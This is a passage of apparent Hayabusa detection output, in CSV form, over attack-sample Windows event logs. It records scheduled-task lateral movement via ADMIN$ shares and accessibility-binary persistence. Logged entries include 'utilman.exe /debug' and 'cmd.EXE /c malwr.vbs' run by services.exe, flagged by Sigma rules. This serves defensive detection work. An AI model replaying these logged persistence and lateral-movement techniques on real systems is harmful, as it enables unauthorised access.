Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: 